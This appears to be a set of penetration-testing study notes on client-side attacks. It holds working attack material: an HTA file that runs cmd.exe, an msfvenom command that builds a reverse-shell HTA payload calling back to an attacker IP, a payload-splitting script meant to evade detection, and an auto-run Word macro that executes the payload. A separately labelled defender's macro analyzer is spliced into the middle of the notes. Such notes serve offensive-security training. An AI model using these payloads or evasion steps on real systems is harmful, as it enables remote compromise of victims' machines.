Module 13 (Client-Side Attacks)
Passive Enumeration:
Identify the victim's browser.
Active Enumeration:
Social Engineering:
Craft messages or scenarios to manipulate users into revealing sensitive information or performing actions.
Tool: fingerprintjs2
A JavaScript library to uniquely identify a browser based on its features.
HTA Attack:
Create an HTA (HTML Application) to execute malicious scripts.
Example HTA file (file.hta):
Copy the HTA file to a web server:
Generate an HTA payload with msfvenom:
Word Macro:
Split the payload to evade detection.
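payload = ""  # payload from msfvenom
n = 50  # chunk length in characters
# Print one VBA concatenation line per n-character chunk
for i in range(0, len(payload), n):
    print('Str = Str + "' + payload[i:i+n] + '"')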
Add the split payload to a Word Macro (document.docm).
Sub AutoOpen()
    test1
End Sub
Sub Document_Open()
    test1
End Sub
Sub test1()
    Dim Str As String
    ' Add the split payload here
    CreateObject("Wscript.shell").Run Str
End Sub
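A defender's view of the split-payload macro above, as an added example that is not part of the original notes: the static check below rejoins `Str = Str + "..."` fragments from extracted VBA source, so keyword matching runs on the whole string rather than on 50-character pieces. The function name, the marker list and the sample macro are constructed for illustration.

```python
import re

# Auto-run entry points Word calls when a document is opened
AUTO_EXEC = ("autoopen", "document_open")
# Constructed list of strings worth flagging once fragments are rejoined
SUSPICIOUS = ("powershell", "cmd.exe", "mshta", "wscript", "-enc")

# Matches: <var> = <var> + "literal"   or   <var> = <var> & "literal"
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+)\s*[+&]\s*"((?:[^"]|"")*)"\s*$', re.I)
SUB = re.compile(r'^\s*(?:public\s+|private\s+)?sub\s+(\w+)', re.I)
SHELL_RUN = re.compile(r'createobject\(\s*"wscript\.shell"\s*\)\.run', re.I)

def analyze_macro(source):
    """Return findings for VBA source text already extracted from a document."""
    rebuilt = {}       # variable name -> reassembled string
    subs = set()       # names of all Sub procedures seen
    shell_run = False
    for line in source.splitlines():
        m = SUB.match(line)
        if m:
            subs.add(m.group(1).lower())
        m = CONCAT.match(line)
        if m and m.group(1).lower() == m.group(2).lower():
            name = m.group(1).lower()
            rebuilt[name] = rebuilt.get(name, "") + m.group(3).replace('""', '"')
        if SHELL_RUN.search(line):
            shell_run = True
    joined = " ".join(rebuilt.values()).lower()
    return {
        "auto_exec": sorted(s for s in subs if s in AUTO_EXEC),
        "shell_run": shell_run,
        "rebuilt": rebuilt,
        "markers": [k for k in SUSPICIOUS if k in joined],
    }

# Constructed sample: a harmless command split into fragments like the macro above
SAMPLE = '''Sub AutoOpen()
test1
End Sub
Sub test1()
Dim Str As String
Str = Str + "power"
Str = Str + "shell.exe -nop "
Str = Str + "-c Write-Host hi"
CreateObject("Wscript.shell").Run Str
End Sub'''

if __name__ == "__main__":
    print(analyze_macro(SAMPLE))
```

No single line of the sample contains the flagged keyword; it only appears after the fragments are rejoined, which is why line-by-line signature matching misses this pattern.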
Object Linking and Embedding (OLE):
Create an evil batch file (evil.bat).
Create a link object in the Word document (document.docm).
Resources:
<!DOCTYPE html>
<html>
<head>
<script>
var x='cmd.exe'
new ActiveXObject('WScript.shell').Run(x);
</script>
</head>
<body>
<script> self.close() </script>
</body>
</html>
sudo cp file.hta /var/www/html/file2.hta
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.114.134 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta